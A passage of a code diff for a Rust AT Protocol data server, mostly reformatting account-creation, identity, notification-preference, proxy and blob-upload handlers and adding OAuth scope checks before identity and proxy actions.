Err(e) = crate::api::repo::record::sequence_account_event(&state, &did, true, None).await 846 { 847 warn!("Failed to sequence account event for {}: {}", did, e); 848 } ··· 861 { 862 warn!("Failed to create default profile for {}: {}", did, e); 863 } 864 - if let Some(ref recipient) = verification_recipient { 865 - if let Err(e) = crate::comms::enqueue_signup_verification( 866 &state.db, 867 user_id, 868 verification_channel, ··· 870 &verification_code, 871 ) 872 .await 873 - { 874 - warn!( 875 - "Failed to enqueue signup verification notification: {:?}", 876 - e 877 - ); 878 - } 879 } 880 } 881
··· 21 fn extract_client_ip(headers: &HeaderMap) -> String { 22 if let Some(forwarded) = headers.get("x-forwarded-for") 23 && let Ok(value) = forwarded.to_str() 24 + && let Some(first_ip) = value.split(',').next() 25 + { 26 + return first_ip.trim().to_string(); 27 + } 28 if let Some(real_ip) = headers.get("x-real-ip") 29 + && let Ok(value) = real_ip.to_str() 30 + { 31 + return value.trim().to_string(); 32 + } 33 "unknown".to_string() 34 } 35 ··· 116 }; 117 118 let is_migration = migration_auth.is_some() 119 + && input 120 + .did 121 + .as_ref() 122 + .map(|d| d.starts_with("did:plc:")) 123 + .unwrap_or(false); 124 125 if is_migration { 126 let migration_did = input.did.as_ref().unwrap(); ··· 153 .map(|e| e.trim().to_string()) 154 .filter(|e| !e.is_empty()); 155 if let Some(ref email) = email 156 + && !crate::api::validation::is_valid_email(email) 157 + { 158 + return ( 159 + StatusCode::BAD_REQUEST, 160 + Json(json!({"error": "InvalidEmail", "message": "Invalid email format"})), 161 + ) 162 + .into_response(); 163 + } 164 let verification_channel = input.verification_channel.as_deref().unwrap_or("email"); 165 let valid_channels = ["email", "discord", "telegram", "signal"]; 166 if !valid_channels.contains(&verification_channel) && !is_migration { ··· 373 }; 374 if is_migration { 375 let existing_account: Option<(uuid::Uuid, String, Option<chrono::DateTime<chrono::Utc>>)> = 376 + sqlx::query_as("SELECT id, handle, deactivated_at FROM users WHERE did = $1 FOR UPDATE") 377 + .bind(&did) 378 + .fetch_optional(&mut *tx) 379 + .await 380 + .unwrap_or(None); 381 if let Some((account_id, old_handle, deactivated_at)) = existing_account { 382 if deactivated_at.is_some() { 383 info!(did = %did, old_handle = %old_handle, new_handle = %short_handle, "Preparing existing account for inbound migration"); 384 + let update_result: Result<_, sqlx::Error> = 385 + sqlx::query("UPDATE users SET handle = $1 WHERE id = $2") 386 + .bind(short_handle) 387 + .bind(account_id) 388 + .execute(&mut *tx) 389 + .await; 390 if let Err(e) = update_result { 391 + if let Some(db_err) = e.as_database_error() 392 + && db_err 393 + .constraint() 394 + .map(|c| c.contains("handle")) 395 + .unwrap_or(false) 396 + { 397 + return ( 398 StatusCode::BAD_REQUEST, 399 Json(json!({"error": "HandleTaken", "message": "Handle already taken by another account"})), 400 ) 401 .into_response(); 402 } 403 error!("Error reactivating account: {:?}", e); 404 return ( ··· 445 .into_response(); 446 } 447 }; 448 + let access_meta = 449 + match crate::auth::create_access_token_with_metadata(&did, &secret_key_bytes) { 450 + Ok(m) => m, 451 + Err(e) => { 452 + error!("Error creating access token: {:?}", e); 453 + return ( 454 + StatusCode::INTERNAL_SERVER_ERROR, 455 + Json(json!({"error": "InternalError"})), 456 + ) 457 + .into_response(); 458 + } 459 + }; 460 + let refresh_meta = match crate::auth::create_refresh_token_with_metadata( 461 + &did, 462 + &secret_key_bytes, 463 + ) { 464 Ok(m) => m, 465 Err(e) => { 466 error!("Error creating refresh token: {:?}", e); ··· 510 } 511 } 512 } 513 + let exists_result: Option<(i32,)> = 514 + sqlx::query_as("SELECT 1 FROM users WHERE handle = $1 AND deactivated_at IS NULL") 515 + .bind(short_handle) 516 + .fetch_optional(&mut *tx) 517 + .await 518 + .unwrap_or(None); 519 if exists_result.is_some() { 520 return ( 521 StatusCode::BAD_REQUEST, ··· 526 let invite_code_required = std::env::var("INVITE_CODE_REQUIRED") 527 .map(|v| v == "true" || v == "1") 528 .unwrap_or(false); 529 + if invite_code_required 530 + && input 531 + .invite_code 532 + .as_ref() 533 + .map(|c| c.trim().is_empty()) 534 + .unwrap_or(true) 535 + { 536 return ( 537 StatusCode::BAD_REQUEST, 538 Json(json!({"error": "InvalidInviteCode", "message": "Invite code is required"})), 539 ) 540 .into_response(); 541 } 542 + if let Some(code) = &input.invite_code 543 + && !code.trim().is_empty() 544 + { 545 + let invite_query = sqlx::query!( 546 + "SELECT available_uses FROM invite_codes WHERE code = $1 FOR UPDATE", 547 + code 548 + ) 549 + .fetch_optional(&mut *tx) 550 + .await; 551 + match invite_query { 552 + Ok(Some(row)) => { 553 + if row.available_uses <= 0 { 554 + return (StatusCode::BAD_REQUEST, Json(json!({"error": "InvalidInviteCode", "message": "Invite code exhausted"}))).into_response(); 555 } 556 + let update_invite = sqlx::query!( 557 + "UPDATE invite_codes SET available_uses = available_uses - 1 WHERE code = $1", 558 + code 559 + ) 560 + .execute(&mut *tx) 561 + .await; 562 + if let Err(e) = update_invite { 563 + error!("Error updating invite code: {:?}", e); 564 return ( 565 StatusCode::INTERNAL_SERVER_ERROR, 566 Json(json!({"error": "InternalError"})), 567 ) 568 .into_response(); 569 } 570 + } 571 + Ok(None) => { 572 + return ( 573 + StatusCode::BAD_REQUEST, 574 + Json(json!({"error": "InvalidInviteCode", "message": "Invite code not found"})), 575 + ) 576 + .into_response(); 577 + } 578 + Err(e) => { 579 + error!("Error checking invite code: {:?}", e); 580 + return ( 581 + StatusCode::INTERNAL_SERVER_ERROR, 582 + Json(json!({"error": "InternalError"})), 583 + ) 584 + .into_response(); 585 } 586 } 587 } ··· 651 Ok((id,)) => id, 652 Err(e) => { 653 if let Some(db_err) = e.as_database_error() 654 + && db_err.code().as_deref() == Some("23505") 655 + { 656 + let constraint = db_err.constraint().unwrap_or(""); 657 + if constraint.contains("handle") || constraint.contains("users_handle") { 658 + return ( 659 + StatusCode::BAD_REQUEST, 660 + Json(json!({ 661 + "error": "HandleNotAvailable", 662 + "message": "Handle already taken" 663 + })), 664 + ) 665 + .into_response(); 666 + } else if constraint.contains("email") || constraint.contains("users_email") { 667 + return ( 668 + StatusCode::BAD_REQUEST, 669 + Json(json!({ 670 + "error": "InvalidEmail", 671 + "message": "Email already registered" 672 + })), 673 + ) 674 + .into_response(); 675 + } else if constraint.contains("did") || constraint.contains("users_did") { 676 + return ( 677 + StatusCode::BAD_REQUEST, 678 + Json(json!({ 679 + "error": "AccountAlreadyExists", 680 + "message": "An account with this DID already exists" 681 + })), 682 + ) 683 + .into_response(); 684 } 685 + } 686 error!("Error inserting user: {:?}", e); 687 return ( 688 StatusCode::INTERNAL_SERVER_ERROR, ··· 692 } 693 }; 694 695 + if !is_migration 696 + && let Err(e) = sqlx::query!( 697 "INSERT INTO channel_verifications (user_id, channel, code, pending_identifier, expires_at) VALUES ($1, 'email', $2, $3, $4)", 698 user_id, 699 verification_code, ··· 709 ) 710 .into_response(); 711 } 712 let encrypted_key_bytes = match crate::config::encrypt_key(&secret_key_bytes) { 713 Ok(enc) => enc, 714 Err(e) => { ··· 825 ) 826 .into_response(); 827 } 828 + if let Some(code) = &input.invite_code 829 + && !code.trim().is_empty() 830 + { 831 + let use_insert = sqlx::query!( 832 + "INSERT INTO invite_code_uses (code, used_by_user) VALUES ($1, $2)", 833 + code, 834 + user_id 835 + ) 836 + .execute(&mut *tx) 837 + .await; 838 + if let Err(e) = use_insert { 839 + error!("Error recording invite usage: {:?}", e); 840 + return ( 841 + StatusCode::INTERNAL_SERVER_ERROR, 842 + Json(json!({"error": "InternalError"})), 843 ) 844 + .into_response(); 845 } 846 } 847 if let Err(e) = tx.commit().await { ··· 854 } 855 if !is_migration { 856 if let Err(e) = 857 + crate::api::repo::record::sequence_identity_event(&state, &did, Some(&full_handle)) 858 + .await 859 { 860 warn!("Failed to sequence identity event for {}: {}", did, e); 861 } 862 + if let Err(e) = 863 + crate::api::repo::record::sequence_account_event(&state, &did, true, None).await 864 { 865 warn!("Failed to sequence account event for {}: {}", did, e); 866 } ··· 879 { 880 warn!("Failed to create default profile for {}: {}", did, e); 881 } 882 + if let Some(ref recipient) = verification_recipient 883 + && let Err(e) = crate::comms::enqueue_signup_verification( 884 &state.db, 885 user_id, 886 verification_channel, ··· 888 &verification_code, 889 ) 890 .await 891 + { 892 + warn!( 893 + "Failed to enqueue signup verification notification: {:?}", 894 + e 895 + ); 896 } 897 } 898
+37 -25
src/api/identity/did.rs
··· 54 .await; 55 (StatusCode::OK, Json(json!({ "did": row.did }))).into_response() 56 } 57 - Ok(None) => { 58 - match crate::handle::resolve_handle(handle).await { 59 - Ok(did) => { 60 - let _ = state 61 - .cache 62 - .set(&cache_key, &did, std::time::Duration::from_secs(300)) 63 - .await; 64 - (StatusCode::OK, Json(json!({ "did": did }))).into_response() 65 - } 66 - Err(_) => ( 67 - StatusCode::NOT_FOUND, 68 - Json(json!({"error": "HandleNotFound", "message": "Unable to resolve handle"})), 69 - ) 70 - .into_response(), 71 } 72 - } 73 Err(e) => { 74 error!("DB error resolving handle: {:?}", e); 75 ( ··· 310 .into_response(); 311 } 312 }; 313 - let auth_user = match crate::auth::validate_bearer_token_allow_deactivated(&state.db, &token).await { 314 - Ok(user) => user, 315 - Err(e) => return ApiError::from(e).into_response(), 316 - }; 317 let user = match sqlx::query!( 318 "SELECT handle FROM users u JOIN user_keys k ON u.id = k.user_id WHERE u.did = $1", 319 auth_user.did ··· 378 Some(t) => t, 379 None => return ApiError::AuthenticationRequired.into_response(), 380 }; 381 - let did = match crate::auth::validate_bearer_token_allow_deactivated(&state.db, &token).await { 382 - Ok(user) => user.did, 383 - Err(e) => return ApiError::from(e).into_response(), 384 - }; 385 let user_id = match sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", did) 386 .fetch_optional(&state.db) 387 .await ··· 414 } else { 415 new_handle 416 }; 417 - (short_handle.to_string(), format!("{}.{}", short_handle, hostname)) 418 } else { 419 match crate::handle::verify_handle_ownership(new_handle, &did).await { 420 Ok(()) => {} ··· 537 let plc_client = crate::plc::PlcClient::new(None); 538 let last_op = plc_client.get_last_op(did).await?; 539 let new_also_known_as = vec![format!("at://{}", new_handle)]; 540 - let update_op = crate::plc::create_update_op(&last_op, None, None, Some(new_also_known_as), None)?; 541 let signed_op = crate::plc::sign_operation(&update_op, &signing_key)?; 542 plc_client.send_operation(did, &signed_op).await?; 543 Ok(())
··· 54 .await; 55 (StatusCode::OK, Json(json!({ "did": row.did }))).into_response() 56 } 57 + Ok(None) => match crate::handle::resolve_handle(handle).await { 58 + Ok(did) => { 59 + let _ = state 60 + .cache 61 + .set(&cache_key, &did, std::time::Duration::from_secs(300)) 62 + .await; 63 + (StatusCode::OK, Json(json!({ "did": did }))).into_response() 64 } 65 + Err(_) => ( 66 + StatusCode::NOT_FOUND, 67 + Json(json!({"error": "HandleNotFound", "message": "Unable to resolve handle"})), 68 + ) 69 + .into_response(), 70 + }, 71 Err(e) => { 72 error!("DB error resolving handle: {:?}", e); 73 ( ··· 308 .into_response(); 309 } 310 }; 311 + let auth_user = 312 + match crate::auth::validate_bearer_token_allow_deactivated(&state.db, &token).await { 313 + Ok(user) => user, 314 + Err(e) => return ApiError::from(e).into_response(), 315 + }; 316 let user = match sqlx::query!( 317 "SELECT handle FROM users u JOIN user_keys k ON u.id = k.user_id WHERE u.did = $1", 318 auth_user.did ··· 377 Some(t) => t, 378 None => return ApiError::AuthenticationRequired.into_response(), 379 }; 380 + let auth_user = 381 + match crate::auth::validate_bearer_token_allow_deactivated(&state.db, &token).await { 382 + Ok(user) => user, 383 + Err(e) => return ApiError::from(e).into_response(), 384 + }; 385 + if let Err(e) = crate::auth::scope_check::check_identity_scope( 386 + auth_user.is_oauth, 387 + auth_user.scope.as_deref(), 388 + crate::oauth::scopes::IdentityAttr::Handle, 389 + ) { 390 + return e; 391 + } 392 + let did = auth_user.did; 393 let user_id = match sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", did) 394 .fetch_optional(&state.db) 395 .await ··· 422 } else { 423 new_handle 424 }; 425 + ( 426 + short_handle.to_string(), 427 + format!("{}.{}", short_handle, hostname), 428 + ) 429 } else { 430 match crate::handle::verify_handle_ownership(new_handle, &did).await { 431 Ok(()) => {} ··· 548 let plc_client = crate::plc::PlcClient::new(None); 549 let last_op = plc_client.get_last_op(did).await?; 550 let new_also_known_as = vec![format!("at://{}", new_handle)]; 551 + let update_op = 552 + crate::plc::create_update_op(&last_op, None, None, Some(new_also_known_as), None)?; 553 let signed_op = crate::plc::sign_operation(&update_op, &signing_key)?; 554 plc_client.send_operation(did, &signed_op).await?; 555 Ok(())
+12 -4
src/api/identity/plc/request.rs
··· 24 Some(t) => t, 25 None => return ApiError::AuthenticationRequired.into_response(), 26 }; 27 - let auth_user = match crate::auth::validate_bearer_token_allow_deactivated(&state.db, &token).await { 28 - Ok(user) => user, 29 - Err(e) => return ApiError::from(e).into_response(), 30 - }; 31 let user = match sqlx::query!("SELECT id FROM users WHERE did = $1", auth_user.did) 32 .fetch_optional(&state.db) 33 .await
··· 24 Some(t) => t, 25 None => return ApiError::AuthenticationRequired.into_response(), 26 }; 27 + let auth_user = 28 + match crate::auth::validate_bearer_token_allow_deactivated(&state.db, &token).await { 29 + Ok(user) => user, 30 + Err(e) => return ApiError::from(e).into_response(), 31 + }; 32 + if let Err(e) = crate::auth::scope_check::check_identity_scope( 33 + auth_user.is_oauth, 34 + auth_user.scope.as_deref(), 35 + crate::oauth::scopes::IdentityAttr::Wildcard, 36 + ) { 37 + return e; 38 + } 39 let user = match sqlx::query!("SELECT id FROM users WHERE did = $1", auth_user.did) 40 .fetch_optional(&state.db) 41 .await
+12 -4
src/api/identity/plc/sign.rs
··· 50 Some(t) => t, 51 None => return ApiError::AuthenticationRequired.into_response(), 52 }; 53 - let auth_user = match crate::auth::validate_bearer_token_allow_deactivated(&state.db, &bearer).await { 54 - Ok(user) => user, 55 - Err(e) => return ApiError::from(e).into_response(), 56 - }; 57 let did = &auth_user.did; 58 let token = match &input.token { 59 Some(t) => t,
··· 50 Some(t) => t, 51 None => return ApiError::AuthenticationRequired.into_response(), 52 }; 53 + let auth_user = 54 + match crate::auth::validate_bearer_token_allow_deactivated(&state.db, &bearer).await { 55 + Ok(user) => user, 56 + Err(e) => return ApiError::from(e).into_response(), 57 + }; 58 + if let Err(e) = crate::auth::scope_check::check_identity_scope( 59 + auth_user.is_oauth, 60 + auth_user.scope.as_deref(), 61 + crate::oauth::scopes::IdentityAttr::Wildcard, 62 + ) { 63 + return e; 64 + } 65 let did = &auth_user.did; 66 let token = match &input.token { 67 Some(t) => t,
+71 -58
src/api/identity/plc/submit.rs
··· 29 Some(t) => t, 30 None => return ApiError::AuthenticationRequired.into_response(), 31 }; 32 - let auth_user = match crate::auth::validate_bearer_token_allow_deactivated(&state.db, &bearer).await { 33 - Ok(user) => user, 34 - Err(e) => return ApiError::from(e).into_response(), 35 - }; 36 let did = &auth_user.did; 37 if let Err(e) = validate_plc_operation(&input.operation) { 38 return ApiError::InvalidRequest(format!("Invalid operation: {}", e)).into_response(); ··· 40 let op = &input.operation; 41 let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 42 let public_url = format!("https://{}", hostname); 43 - let user = match sqlx::query!("SELECT id, handle, deactivated_at FROM users WHERE did = $1", did) 44 - .fetch_optional(&state.db) 45 - .await 46 { 47 Ok(Some(row)) => row, 48 _ => { ··· 94 } 95 }; 96 let user_did_key = signing_key_to_did_key(&signing_key); 97 - if !is_migration { 98 - if let Some(rotation_keys) = op.get("rotationKeys").and_then(|v| v.as_array()) { 99 - let server_rotation_key = 100 - std::env::var("PLC_ROTATION_KEY").unwrap_or_else(|_| user_did_key.clone()); 101 - let has_server_key = rotation_keys 102 - .iter() 103 - .any(|k| k.as_str() == Some(&server_rotation_key)); 104 - if !has_server_key { 105 - return ( 106 - StatusCode::BAD_REQUEST, 107 - Json(json!({ 108 - "error": "InvalidRequest", 109 - "message": "Rotation keys do not include server's rotation key" 110 - })), 111 - ) 112 - .into_response(); 113 - } 114 } 115 } 116 if let Some(services) = op.get("services").and_then(|v| v.as_object()) 117 - && let Some(pds) = services.get("atproto_pds").and_then(|v| v.as_object()) { 118 - let service_type = pds.get("type").and_then(|v| v.as_str()); 119 - let endpoint = pds.get("endpoint").and_then(|v| v.as_str()); 120 - if service_type != Some("AtprotoPersonalDataServer") { 121 - return ( 122 - StatusCode::BAD_REQUEST, 123 - Json(json!({ 124 - "error": "InvalidRequest", 125 - "message": "Incorrect type on atproto_pds service" 126 - })), 127 - ) 128 - .into_response(); 129 - } 130 - if endpoint != Some(&public_url) { 131 - return ( 132 - StatusCode::BAD_REQUEST, 133 - Json(json!({ 134 - "error": "InvalidRequest", 135 - "message": "Incorrect endpoint on atproto_pds service" 136 - })), 137 - ) 138 - .into_response(); 139 - } 140 } 141 if !is_migration { 142 - if let Some(verification_methods) = op.get("verificationMethods").and_then(|v| v.as_object()) 143 && let Some(atproto_key) = verification_methods.get("atproto").and_then(|v| v.as_str()) 144 - && atproto_key != user_did_key { 145 - return ( 146 - StatusCode::BAD_REQUEST, 147 - Json(json!({ 148 - "error": "InvalidRequest", 149 - "message": "Incorrect signing key in verificationMethods" 150 - })), 151 - ) 152 - .into_response(); 153 - } 154 if let Some(also_known_as) = op.get("alsoKnownAs").and_then(|v| v.as_array()) { 155 let expected_handle = format!("at://{}", user.handle); 156 let first_aka = also_known_as.first().and_then(|v| v.as_str());
··· 29 Some(t) => t, 30 None => return ApiError::AuthenticationRequired.into_response(), 31 }; 32 + let auth_user = 33 + match crate::auth::validate_bearer_token_allow_deactivated(&state.db, &bearer).await { 34 + Ok(user) => user, 35 + Err(e) => return ApiError::from(e).into_response(), 36 + }; 37 + if let Err(e) = crate::auth::scope_check::check_identity_scope( 38 + auth_user.is_oauth, 39 + auth_user.scope.as_deref(), 40 + crate::oauth::scopes::IdentityAttr::Wildcard, 41 + ) { 42 + return e; 43 + } 44 let did = &auth_user.did; 45 if let Err(e) = validate_plc_operation(&input.operation) { 46 return ApiError::InvalidRequest(format!("Invalid operation: {}", e)).into_response(); ··· 48 let op = &input.operation; 49 let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 50 let public_url = format!("https://{}", hostname); 51 + let user = match sqlx::query!( 52 + "SELECT id, handle, deactivated_at FROM users WHERE did = $1", 53 + did 54 + ) 55 + .fetch_optional(&state.db) 56 + .await 57 { 58 Ok(Some(row)) => row, 59 _ => { ··· 105 } 106 }; 107 let user_did_key = signing_key_to_did_key(&signing_key); 108 + if !is_migration && let Some(rotation_keys) = op.get("rotationKeys").and_then(|v| v.as_array()) 109 + { 110 + let server_rotation_key = 111 + std::env::var("PLC_ROTATION_KEY").unwrap_or_else(|_| user_did_key.clone()); 112 + let has_server_key = rotation_keys 113 + .iter() 114 + .any(|k| k.as_str() == Some(&server_rotation_key)); 115 + if !has_server_key { 116 + return ( 117 + StatusCode::BAD_REQUEST, 118 + Json(json!({ 119 + "error": "InvalidRequest", 120 + "message": "Rotation keys do not include server's rotation key" 121 + })), 122 + ) 123 + .into_response(); 124 } 125 } 126 if let Some(services) = op.get("services").and_then(|v| v.as_object()) 127 + && let Some(pds) = services.get("atproto_pds").and_then(|v| v.as_object()) 128 + { 129 + let service_type = pds.get("type").and_then(|v| v.as_str()); 130 + let endpoint = pds.get("endpoint").and_then(|v| v.as_str()); 131 + if service_type != Some("AtprotoPersonalDataServer") { 132 + return ( 133 + StatusCode::BAD_REQUEST, 134 + Json(json!({ 135 + "error": "InvalidRequest", 136 + "message": "Incorrect type on atproto_pds service" 137 + })), 138 + ) 139 + .into_response(); 140 } 141 + if endpoint != Some(&public_url) { 142 + return ( 143 + StatusCode::BAD_REQUEST, 144 + Json(json!({ 145 + "error": "InvalidRequest", 146 + "message": "Incorrect endpoint on atproto_pds service" 147 + })), 148 + ) 149 + .into_response(); 150 + } 151 + } 152 if !is_migration { 153 + if let Some(verification_methods) = 154 + op.get("verificationMethods").and_then(|v| v.as_object()) 155 && let Some(atproto_key) = verification_methods.get("atproto").and_then(|v| v.as_str()) 156 + && atproto_key != user_did_key 157 + { 158 + return ( 159 + StatusCode::BAD_REQUEST, 160 + Json(json!({ 161 + "error": "InvalidRequest", 162 + "message": "Incorrect signing key in verificationMethods" 163 + })), 164 + ) 165 + .into_response(); 166 + } 167 if let Some(also_known_as) = op.get("alsoKnownAs").and_then(|v| v.as_array()) { 168 let expected_handle = format!("at://{}", user.handle); 169 let first_aka = also_known_as.first().and_then(|v| v.as_str());
+72 -46
src/api/notification_prefs.rs
··· 147 } 148 }; 149 150 - let user_id: uuid::Uuid = match sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", user.did) 151 - .fetch_one(&state.db) 152 - .await 153 - { 154 - Ok(id) => id, 155 - Err(e) => return ( 156 - StatusCode::INTERNAL_SERVER_ERROR, 157 - Json(json!({"error": "InternalError", "message": format!("Database error: {}", e)})), 158 - ) 159 - .into_response(), 160 - }; 161 162 - let rows = match sqlx::query!( 163 - r#" 164 SELECT 165 created_at, 166 channel as "channel: String", ··· 173 ORDER BY created_at DESC 174 LIMIT 50 175 "#, 176 - user_id 177 - ) 178 - .fetch_all(&state.db) 179 - .await 180 - { 181 - Ok(r) => r, 182 - Err(e) => return ( 183 - StatusCode::INTERNAL_SERVER_ERROR, 184 - Json(json!({"error": "InternalError", "message": format!("Database error: {}", e)})), 185 ) 186 - .into_response(), 187 - }; 188 189 - let notifications = rows.iter().map(|row| { 190 - NotificationHistoryEntry { 191 created_at: row.created_at.to_rfc3339(), 192 channel: row.channel.clone(), 193 comms_type: row.comms_type.clone(), 194 status: row.status.clone(), 195 subject: row.subject.clone(), 196 body: row.body.clone(), 197 - } 198 - }).collect(); 199 200 Json(GetNotificationHistoryResponse { notifications }).into_response() 201 } ··· 297 } 298 }; 299 300 - let user_row = match sqlx::query!( 301 - "SELECT id, handle, email FROM users WHERE did = $1", 302 - user.did 303 - ) 304 - .fetch_one(&state.db) 305 - .await 306 - { 307 - Ok(row) => row, 308 - Err(e) => return ( 309 - StatusCode::INTERNAL_SERVER_ERROR, 310 - Json(json!({"error": "InternalError", "message": format!("Database error: {}", e)})), 311 ) 312 - .into_response(), 313 - }; 314 315 let user_id = user_row.id; 316 let handle = user_row.handle; ··· 384 .into_response(); 385 } 386 387 - if let Err(e) = request_channel_verification(&state.db, user_id, "email", &email_clean, Some(&handle)).await { 388 return ( 389 StatusCode::INTERNAL_SERVER_ERROR, 390 Json(json!({"error": "InternalError", "message": e})), ··· 419 .await; 420 info!(did = %user.did, "Cleared Discord ID"); 421 } else { 422 - if let Err(e) = request_channel_verification(&state.db, user_id, "discord", discord_id, None).await { 423 return ( 424 StatusCode::INTERNAL_SERVER_ERROR, 425 Json(json!({"error": "InternalError", "message": e})), ··· 455 .await; 456 info!(did = %user.did, "Cleared Telegram username"); 457 } else { 458 - if let Err(e) = request_channel_verification(&state.db, user_id, "telegram", telegram_clean, None).await { 459 return ( 460 StatusCode::INTERNAL_SERVER_ERROR, 461 Json(json!({"error": "InternalError", "message": e})), ··· 490 .await; 491 info!(did = %user.did, "Cleared Signal number"); 492 } else { 493 - if let Err(e) = request_channel_verification(&state.db, user_id, "signal", signal, None).await { 494 return ( 495 StatusCode::INTERNAL_SERVER_ERROR, 496 Json(json!({"error": "InternalError", "message": e})), ··· 505 Json(UpdateNotificationPrefsResponse { 506 success: true, 507 verification_required, 508 - }).into_response() 509 }
··· 147 } 148 }; 149 150 + let user_id: uuid::Uuid = 151 + match sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", user.did) 152 + .fetch_one(&state.db) 153 + .await 154 + { 155 + Ok(id) => id, 156 + Err(e) => return ( 157 + StatusCode::INTERNAL_SERVER_ERROR, 158 + Json( 159 + json!({"error": "InternalError", "message": format!("Database error: {}", e)}), 160 + ), 161 + ) 162 + .into_response(), 163 + }; 164 165 + let rows = 166 + match sqlx::query!( 167 + r#" 168 SELECT 169 created_at, 170 channel as "channel: String", ··· 177 ORDER BY created_at DESC 178 LIMIT 50 179 "#, 180 + user_id 181 ) 182 + .fetch_all(&state.db) 183 + .await 184 + { 185 + Ok(r) => r, 186 + Err(e) => return ( 187 + StatusCode::INTERNAL_SERVER_ERROR, 188 + Json( 189 + json!({"error": "InternalError", "message": format!("Database error: {}", e)}), 190 + ), 191 + ) 192 + .into_response(), 193 + }; 194 195 + let notifications = rows 196 + .iter() 197 + .map(|row| NotificationHistoryEntry { 198 created_at: row.created_at.to_rfc3339(), 199 channel: row.channel.clone(), 200 comms_type: row.comms_type.clone(), 201 status: row.status.clone(), 202 subject: row.subject.clone(), 203 body: row.body.clone(), 204 + }) 205 + .collect(); 206 207 Json(GetNotificationHistoryResponse { notifications }).into_response() 208 } ··· 304 } 305 }; 306 307 + let user_row = 308 + match sqlx::query!( 309 + "SELECT id, handle, email FROM users WHERE did = $1", 310 + user.did 311 ) 312 + .fetch_one(&state.db) 313 + .await 314 + { 315 + Ok(row) => row, 316 + Err(e) => return ( 317 + StatusCode::INTERNAL_SERVER_ERROR, 318 + Json( 319 + json!({"error": "InternalError", "message": format!("Database error: {}", e)}), 320 + ), 321 + ) 322 + .into_response(), 323 + }; 324 325 let user_id = user_row.id; 326 let handle = user_row.handle; ··· 394 .into_response(); 395 } 396 397 + if let Err(e) = request_channel_verification( 398 + &state.db, 399 + user_id, 400 + "email", 401 + &email_clean, 402 + Some(&handle), 403 + ) 404 + .await 405 + { 406 return ( 407 StatusCode::INTERNAL_SERVER_ERROR, 408 Json(json!({"error": "InternalError", "message": e})), ··· 437 .await; 438 info!(did = %user.did, "Cleared Discord ID"); 439 } else { 440 + if let Err(e) = 441 + request_channel_verification(&state.db, user_id, "discord", discord_id, None).await 442 + { 443 return ( 444 StatusCode::INTERNAL_SERVER_ERROR, 445 Json(json!({"error": "InternalError", "message": e})), ··· 475 .await; 476 info!(did = %user.did, "Cleared Telegram username"); 477 } else { 478 + if let Err(e) = 479 + request_channel_verification(&state.db, user_id, "telegram", telegram_clean, None) 480 + .await 481 + { 482 return ( 483 StatusCode::INTERNAL_SERVER_ERROR, 484 Json(json!({"error": "InternalError", "message": e})), ··· 513 .await; 514 info!(did = %user.did, "Cleared Signal number"); 515 } else { 516 + if let Err(e) = 517 + request_channel_verification(&state.db, user_id, "signal", signal, None).await 518 + { 519 return ( 520 StatusCode::INTERNAL_SERVER_ERROR, 521 Json(json!({"error": "InternalError", "message": e})), ··· 530 Json(UpdateNotificationPrefsResponse { 531 success: true, 532 verification_required, 533 + }) 534 + .into_response() 535 }
+10 -4
src/api/proxy.rs
··· 18 RawQuery(query): RawQuery, 19 body: Bytes, 20 ) -> Response { 21 - let proxy_header = match headers 22 - .get("atproto-proxy") 23 - .and_then(|h| h.to_str().ok()) 24 - { 25 Some(h) => h.to_string(), 26 None => { 27 return ( ··· 66 ) { 67 match crate::auth::validate_bearer_token(&state.db, &token).await { 68 Ok(auth_user) => { 69 if let Some(key_bytes) = auth_user.key_bytes { 70 match crate::auth::create_service_token( 71 &auth_user.did,
··· 18 RawQuery(query): RawQuery, 19 body: Bytes, 20 ) -> Response { 21 + let proxy_header = match headers.get("atproto-proxy").and_then(|h| h.to_str().ok()) { 22 Some(h) => h.to_string(), 23 None => { 24 return ( ··· 63 ) { 64 match crate::auth::validate_bearer_token(&state.db, &token).await { 65 Ok(auth_user) => { 66 + if let Err(e) = crate::auth::scope_check::check_rpc_scope( 67 + auth_user.is_oauth, 68 + auth_user.scope.as_deref(), 69 + &resolved.did, 70 + &method, 71 + ) { 72 + return e; 73 + } 74 + 75 if let Some(key_bytes) = auth_user.key_bytes { 76 match crate::auth::create_service_token( 77 &auth_user.did,
+31 -20
src/api/repo/blob.rs
··· 62 } else { 63 match crate::auth::validate_bearer_token_allow_deactivated(&state.db, &token).await { 64 Ok(user) => { 65 let deactivated = sqlx::query_scalar!( 66 "SELECT deactivated_at FROM users WHERE did = $1", 67 user.did ··· 171 .blob_store 172 .put_bytes(&storage_key, bytes::Bytes::from(data)) 173 .await 174 - { 175 - error!("Failed to upload blob to storage: {:?}", e); 176 - return ( 177 - StatusCode::INTERNAL_SERVER_ERROR, 178 - Json(json!({"error": "InternalError", "message": "Failed to store blob"})), 179 - ) 180 - .into_response(); 181 - } 182 if let Err(e) = tx.commit().await { 183 error!("Failed to commit blob transaction: {:?}", e); 184 - if was_inserted 185 - && let Err(cleanup_err) = state.blob_store.delete(&storage_key).await { 186 - error!( 187 - "Failed to cleanup orphaned blob {}: {:?}", 188 - storage_key, cleanup_err 189 - ); 190 - } 191 return ( 192 StatusCode::INTERNAL_SERVER_ERROR, 193 Json(json!({"error": "InternalError"})), ··· 231 if let Some(obj) = val.as_object() { 232 if let Some(type_val) = obj.get("$type") 233 && type_val == "blob" 234 - && let Some(r) = obj.get("ref") 235 - && let Some(link) = r.get("$link") 236 - && let Some(s) = link.as_str() { 237 - blobs.push(s.to_string()); 238 - } 239 for (_, v) in obj { 240 find_blobs(v, blobs); 241 }
